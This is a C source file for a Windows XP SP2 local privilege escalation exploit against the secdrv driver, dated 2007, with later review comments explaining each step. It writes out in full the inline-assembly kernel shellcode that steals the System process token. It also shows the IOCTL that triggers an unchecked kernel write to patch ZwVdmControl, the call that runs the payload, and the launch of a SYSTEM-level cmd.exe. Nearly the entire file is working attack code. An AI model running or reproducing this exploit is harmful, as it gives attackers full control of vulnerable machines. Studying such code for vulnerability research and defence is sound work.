/*
 * Author:   Polymorphours
 * Email:    [email protected]
 * Homepage: http://www.whitecell.org
 * Date:     2007-10-23
 */
#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment (lib, "ntdll.lib")
/*
 * Minimal NT status plumbing for a user-mode build that does not pull in
 * ntstatus.h.  STATUS_SUCCESS is the only code checked below (result of
 * NtAllocateVirtualMemory in main()); STATUS_INFO_LENGTH_MISMATCH is not
 * referenced anywhere in this listing.
 */
typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
/*
 * PE base-relocation entry (12-bit page offset, 4-bit relocation type).
 * Declared but not used by any code in this listing; left in place so the
 * layout stays available to callers compiled against this file.
 */
typedef struct _IMAGE_FIXUP_ENTRY {
WORD offset:12;
WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
/*
 * Native UNICODE_STRING: Length and MaximumLength are byte counts, Buffer is
 * not necessarily NUL-terminated.  Not referenced by the code below.
 */
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
/*
 * Only the one information class needed for NtQuerySystemInformation's
 * loaded-module enumeration.  Nothing in this listing actually calls
 * NtQuerySystemInformation; the enum is a leftover.
 */
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;
/*
 * One entry of the SystemModuleInformation (class 11) result.
 *
 * Field sizes here assume a 32-bit build (ULONG/PVOID both 4 bytes), which is
 * consistent with the rest of this file (x86 inline assembly, DWORD pointer
 * arithmetic).  The structure is declared but never used by the code below.
 */
typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;   // offset of the file name inside ImageName
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/* Signature of ntdll!NtAllocateVirtualMemory (32-bit, stdcall). */
typedef NTSTATUS (NTAPI *NT_ALLOCATE_VIRTUAL_MEMORY_FN)(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,       /* requested base in, actual base out */
    IN ULONG ZeroBits,
    IN OUT PULONG AllocationSize,    /* requested size in, rounded size out */
    IN ULONG AllocationType,
    IN ULONG Protect
    );

/*
 * Resolved at run time with GetProcAddress in main(); NULL until then.
 * Kept as a plain global so the existing cast-and-assign in main() still
 * type-checks unchanged.
 */
NT_ALLOCATE_VIRTUAL_MEMORY_FN NtAllocateVirtualMemory;
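/*
 * Copy the kernel-mode payload into ShellCodeMemory.
 *
 * The payload is the byte range between the first "nop" after
 * "call CopyXpShellCode" and the CopyXpShellCode label.  The call pushes the
 * address of that first nop and immediately jumps past the payload, so the
 * payload is never executed in user mode here; "pop esi" recovers its start
 * address, "lea ecx, CopyXpShellCode / sub ecx, esi" computes its length, and
 * "rep movsb" copies it to ShellCodeMemory.
 *
 * What the payload does when main() later reaches it through the patched
 * ZwVdmControl stub (see the original comments in the asm): it reads a
 * pointer from the KPCR (0xFFDFF124), takes the process at +0x220 of the
 * structure it points to (presumably KTHREAD -> current EPROCESS), walks the
 * +0x88 link list until it finds the process whose id (+0x84) is 4 (System),
 * and copies that process's token pointer (+0xc8) over the current process's
 * token.  It finishes with "ret 8", which balances the two arguments main()
 * pushes before "call eax".
 *
 * NOTE(review): every constant in the payload (0xFFDFF124, 0x220, 0x88,
 * 0x84, 0xc8) is tied to 32-bit Windows XP SP2 with the default 2 GB split
 * (the original comment says "not 3G Mode").  On any other build the writes
 * land on unrelated kernel memory, so this function only accepts NT 5.1.
 *
 * ShellCodeMemory: writable, executable destination; must hold at least
 *                  (CopyXpShellCode - first nop) bytes.  main() passes a
 *                  slot 0x200 bytes into a 0x1000-byte RWX page.
 *
 * Does not return on an unsupported OS: prints a message and calls
 * ExitProcess.  The original version returned silently for NT 5.0/5.2 and
 * left the caller to jump into a bare NOP sled in kernel mode.
 */
VOID
SetShellCodeToMemory(
    PVOID ShellCodeMemory
    )
{
    OSVERSIONINFOEX OsVersionInfo;

    /* A failed GetVersionEx leaves the struct zeroed and is rejected below. */
    RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
    OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
    GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

    if ( OsVersionInfo.dwMajorVersion != 5 ) {
        printf( "Not NT5 system\n" );
        ExitProcess( 0 );
    }

    /* Only an XP (5.1) payload exists; fail closed rather than copy nothing. */
    if ( OsVersionInfo.dwMinorVersion != 1 ) {
        printf( "NT 5.%lu is not supported, only XP (NT 5.1)\n",
                OsVersionInfo.dwMinorVersion );
        ExitProcess( 1 );   /* non-zero so a caller can tell this from success */
    }

    __asm {
        call CopyXpShellCode
        nop
        nop
        nop
        nop
        nop
        nop
        mov eax,0xFFDFF124      // eax = KPCR (not 3G Mode)
        mov eax,[eax]
        mov esi,[eax+0x220]     // esi = current process
        mov eax,esi
    searchXp:
        mov eax,[eax+0x88]      // next entry in the process list
        sub eax,0x88            // back to the start of that process structure
        mov edx,[eax+0x84]      // process id
        cmp edx,0x4             // Find System Process (PID 4)
        jne searchXp
        mov eax,[eax+0xc8]      // read the System process's token
        mov [esi+0xc8],eax      // overwrite the current process's token
        ret 8                   // pops the two args pushed by main()
    CopyXpShellCode:
        pop esi                 // esi = address of the first nop (return address of the call)
        mov edi, ShellCodeMemory
        lea ecx, CopyXpShellCode
        sub ecx, esi            // ecx = payload length in bytes
        cld
        rep movsb
    }
}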
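/*
 * Entry point of the secdrv local privilege escalation proof of concept
 * (32-bit Windows XP SP2 only, per the banner and the hard-coded addresses).
 *
 * Steps:
 *   1. Start the "secdrv" service so that \\.\secdrv can be opened.
 *   2. Resolve NtAllocateVirtualMemory and ZwVdmControl from ntdll.
 *   3. Allocate a 0x1000-byte RWX page as low as possible (base 0x200 is
 *      requested; the kernel rounds the base down and writes the actual base
 *      back into ShellCodeMemory), fill it with NOPs and copy the kernel
 *      payload at +0x200.
 *   4. Send IOCTL 0xca002813 with a raw kernel address (HookAddress) as the
 *      output buffer.  NOTE(review): the listing does not show what the driver
 *      writes there, and HookAddress is documented only as "test by xp sp2";
 *      on any other build this is a blind kernel write and will crash the
 *      machine.
 *   5. Call ZwVdmControl(0, 0).  After step 4 this is expected to execute the
 *      payload in kernel mode; the payload's "ret 8" matches the two pushed
 *      arguments, as does the real stdcall stub if the patch did not happen.
 *   6. Spawn cmd.exe, which inherits the (now swapped) process token.
 *
 * argc/argv are unused.  Returns 0 when every step reported success and 1
 * otherwise; the original returned 0 on every path, which hid failures from
 * any wrapper script.
 */
int main(int argc, char* argv[])
{
    NTSTATUS status;
    PVOID ZwVdmControl = NULL;
    DWORD HookAddress = 0x804E3AD8;         /* test by xp sp2 (original note) */
    PVOID ShellCodeMemory = (PVOID)0x200;   /* requested base; overwritten with the real base */
    DWORD MemorySize = 0x1000;
    HANDLE deviceHandle;
    DWORD dwReturnSize = 0;
    SC_HANDLE hscmHandle = NULL;
    SC_HANDLE hscDriver = NULL;
    PROCESS_INFORMATION pi;
    STARTUPINFOA stStartup;
    PVOID InputBuffer = NULL;
    HMODULE ntdll;
    BOOL ioctlOk;
    char cmdLine[] = "cmd.exe";             /* CreateProcess may write to lpCommandLine */

    (void)argc;
    (void)argv;

    printf( "\tWindows Local Privilege Escalation Vulnerability Exploit 0day (POC)\n" );
    printf( "Create by Whitecell's [email protected] 2007/04/15\n" );
    printf( "TEST OS: WINDOWS XP SP2\n" );

    /* 1. make sure the vulnerable driver is loaded */
    printf( "\nConnect SCM ... " );
    hscmHandle = OpenSCManager ( NULL, NULL, GENERIC_READ | SERVICE_START );
    if ( NULL == hscmHandle ) {
        printf( "failed, code: %lu\n", GetLastError() );
        return 1;
    }
    printf( "success!!\n" );

    printf( "\nOpen services ... " );
    hscDriver = OpenService( hscmHandle, "secdrv", GENERIC_READ | SERVICE_START );
    if ( NULL == hscDriver ) {
        printf( "failed, code: %lu\n", GetLastError() );
        CloseServiceHandle ( hscmHandle );
        return 1;
    }
    printf( "success!!\n" );

    printf( "\nStart services ... " );
    /* Start the secdrv driver; an already running driver is fine. */
    if ( !StartService( hscDriver, 0, NULL ) ) {
        DWORD err = GetLastError();
        if ( ERROR_SERVICE_ALREADY_RUNNING != err ) {
            printf( "failed, code: %lu\n", err );
            CloseServiceHandle ( hscDriver );
            CloseServiceHandle ( hscmHandle );
            return 1;
        }
    }
    printf( "success!!\n" );
    CloseServiceHandle ( hscDriver );
    CloseServiceHandle ( hscmHandle );

    /* 2. resolve the ntdll entry points (ntdll is always mapped, no LoadLibrary needed) */
    ntdll = GetModuleHandle( "ntdll.dll" );
    if ( ntdll == NULL ) {
        printf( "GetModuleHandle(ntdll.dll) failed, code: %lu\n", GetLastError() );
        return 1;
    }
    NtAllocateVirtualMemory = (NTSTATUS (NTAPI *)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG))
        GetProcAddress( ntdll, "NtAllocateVirtualMemory" );
    if ( NtAllocateVirtualMemory == NULL ) {
        printf( "GetProcAddress failed, code: %lu\n", GetLastError() );
        return 1;
    }
    /* Checked here because the inline asm below does "call eax" on it blindly. */
    ZwVdmControl = GetProcAddress( ntdll, "ZwVdmControl" );
    if ( ZwVdmControl == NULL ) {
        printf( "GetProcAddress(ZwVdmControl) failed, code: %lu\n", GetLastError() );
        return 1;
    }

    /* 3. executable scratch page */
    printf( "\nCreate execute environment ... " );
    status = NtAllocateVirtualMemory( (HANDLE)-1,
                                      &ShellCodeMemory,
                                      0,
                                      &MemorySize,
                                      MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                                      PAGE_EXECUTE_READWRITE );
    if ( status != STATUS_SUCCESS ) {
        printf( "failed!\n[-] NtAllocateVirtualMemory failed, status: %08X\n", (unsigned)status );
        return 1;
    }
    printf( "Ok!\n" );

    /* NOP sled across the whole page, payload 0x200 bytes in.
     * SetShellCodeToMemory exits the process itself on an unsupported OS. */
    memset( ShellCodeMemory, 0x90, MemorySize );
    SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x200) );

    deviceHandle = CreateFile("\\\\.\\secdrv",
                              0,
                              FILE_SHARE_READ|FILE_SHARE_WRITE,
                              NULL,
                              OPEN_EXISTING,
                              0,
                              NULL);
    if ( INVALID_HANDLE_VALUE == deviceHandle ) {
        printf( "[-] Open device failed, code: %lu\n", GetLastError() );
        return 1;
    }
    printf( "\nOpen device success\n" );

    /* 4. the kernel write */
    InputBuffer = LocalAlloc( LPTR, 0x1000 );
    if ( InputBuffer == NULL ) {
        printf( "[-] LocalAlloc failed, code: %lu\n", GetLastError() );
        CloseHandle( deviceHandle );
        return 1;
    }
    *(PDWORD)InputBuffer = 0x1;
    *(PDWORD)((DWORD)InputBuffer + 0x4) = 0x96;

    /*
     * The output buffer is HookAddress, a kernel address: the driver writes
     * its result there without validating the pointer.  Only 4 input bytes
     * are declared (nInBufferSize) although 8 are initialised; kept as in the
     * original because the driver's expected input format is not shown here.
     */
    ioctlOk = DeviceIoControl( deviceHandle,
                               0xca002813,
                               InputBuffer,
                               4,
                               (PVOID)HookAddress,
                               4,
                               &dwReturnSize,
                               NULL );
    LocalFree( InputBuffer );
    CloseHandle( deviceHandle );
    if ( !ioctlOk ) {
        /* The original ignored this.  The driver may still have performed
         * the write before reporting failure, and calling an unpatched
         * ZwVdmControl(0, 0) is harmless, so warn and carry on. */
        printf( "[!] DeviceIoControl returned failure, code: %lu (continuing)\n", GetLastError() );
    }

    /* 5. run the payload through the patched syscall stub */
    printf( "\ncall shellcode ... " );
    _asm {
        xor ecx,ecx
        push ecx
        push ecx
        mov eax, ZwVdmControl
        call eax
    }
    printf( "Done.\n" );

    /* 6. the child inherits the swapped token */
    printf( "\nCreate New Process\n" );
    GetStartupInfo( &stStartup );
    if ( !CreateProcess( NULL,
                         cmdLine,
                         NULL,
                         NULL,
                         TRUE,
                         0,
                         NULL,
                         NULL,
                         &stStartup,
                         &pi ) ) {
        printf( "[-] CreateProcess failed, code: %lu\n", GetLastError() );
        return 1;
    }
    CloseHandle( pi.hThread );
    CloseHandle( pi.hProcess );
    return 0;
}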
/* Reference: http://www.4v1.org/thread-256-1-1.html */